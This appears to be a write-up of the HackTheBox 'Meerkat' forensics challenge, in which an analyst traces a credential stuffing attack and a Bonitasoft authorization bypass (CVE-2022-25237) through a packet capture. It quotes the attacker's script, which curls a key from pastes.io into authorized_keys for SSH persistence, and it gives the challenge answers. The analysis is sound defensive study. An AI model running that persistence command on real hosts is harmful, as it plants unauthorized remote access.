HackTheBox Sherlocks: Meerkat

This is a writeup for the HackThebox Meerkat challenge

Task 1: We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

After downloading the PCAP file and opening the file with wireshark we can see that the majority of the traffic is HTTP based on the “Protocol Hierarchy Statistics” feature.

To apply a filter HTTP traffic, simply use the “http” keyword in the wireshark search feature.

Immediatly upon filtering for HTTP traffic you’ll notice a lot of paths with the ‘/bonita’ prefix. A simple Google search for Bonita Business Management Platform shows that the full name is actually ‘Bonitasoft’, which is also the first flag.

Task 2: We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

When investigating the large amount of POST requests performed to /bonita/loginservice you’ll notice that most (if not all) requests contain a unique combination of both username and the password; this is slightly different compared to a ’traditional’ bruteforce, where an attacker picks particular username and attempts iterates over potential passwords. The type of attack performed here is called a ‘credential stuffing’, often used with a list of leaked credentials.

Task 3: Does the vulnerability exploited have a CVE assigned - and if so, which one?

The task also included a JSON file with IDS alert details. The alerts contain a unique field called ‘cve’ and a potential CVE listed in the signature name. The CVE listed in the alert/signature is ‘CVE-2022-25237’

Task 4: Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

Going back to the PCAP; most of the POST requests return a 401 (ie. unauthorized). Scrolling through the requests, you’ll see multiple succesfull/200 POST and GET request to a path containing ‘i18ntranslation’. This string is appended to each request to bypass the authorization filter.

Task 5: How many combinations of usernames and passwords were used in the credential stuffing attack?

Since we’ve seen the bruteforce requests performed on ‘/bonita/loginservice’ we can write a tshark filter to create an export of the post data and count the unique users. The command I used was:

tshark -r meerkat.pcap -Y 'http.request.method == POST && http.request.uri == "/bonita/loginservice"' -T fields -e http.file_data > bruteforce.txt

To decode the content and iterate over the users I wrote a small Python script to count the unique usernames.

from urllib.parse import unquote

unique_users = set()

# Open the previously exported bruteforce file
with open('bruteforce.txt', 'r') as bruteforce_file:
    for line in bruteforce_file:

        # Hex decode each line
        content = bytearray.fromhex(line).decode()
        decoded = unquote(content)

        ## The install user is also present in the bruteforce
        ## but for some reason this did not count as a valid user for the challenge
        if not 'install' in decoded:
            # Split the content based on the & sign and append the first 
            # entry (ie. the username) to our unique_user set
            unique_users.add(decoded.split('&')[0])

# Print the count of unique users in the set
print(len(unique_users))

Running the script should return 56 unique users.

Task 6: Which username and password combination was successful?

Going back to the PCAP file, only a single POST request to ‘/bonita/loginservice’ was succesfull, indicated by the 204 response code. Upon opening the response the following user/password combination can be found: [email protected]:g0vernm3nt

Eventually the attacker performs several GET requests to the path containing “rce” to execute local commands. You can apply a Wireshark filter for these requests with ‘http.request.uri contains “rce”’. You should now see a requests being performed where wget is used to download a file from pastes.io: https://pastes.io/raw/bx5gcr0et8/

Task 8: Please provide the filename of the public key used by the attacker to gain persistence on our host.

When investigating the content of the downloaded file, you’ll notice another file being downloaded from the same domain.

#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart%

The hffgra4un file is then saved to the /home/ubuntu/.ssh/authorized_keys file for persistence via SSH.

Task 10. Can you confirmed the file modified by the attacker to gain persistence?

As previously written, the file is saved to /home/ubuntu/.ssh/authorized_keys.

Task 11. Can you confirm the MITRE technique ID of this type of persistence mechanism?

This particular method of persistence is documented as T1098.004, also known as “Account Manipulation: SSH Authorized Keys”. The different the different methods of persistence are documented on https://attack.mitre.org/tactics/TA0003/.

Task 1: We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?#

Task 2: We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?#

Task 3: Does the vulnerability exploited have a CVE assigned - and if so, which one?#

Task 4: Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?#

Task 5: How many combinations of usernames and passwords were used in the credential stuffing attack?#

Task 6: Which username and password combination was successful?#

Task 7: If any, which text sharing site did the attacker utilise?#

Task 8: Please provide the filename of the public key used by the attacker to gain persistence on our host.#

Task 10. Can you confirmed the file modified by the attacker to gain persistence?#

Task 11. Can you confirm the MITRE technique ID of this type of persistence mechanism?#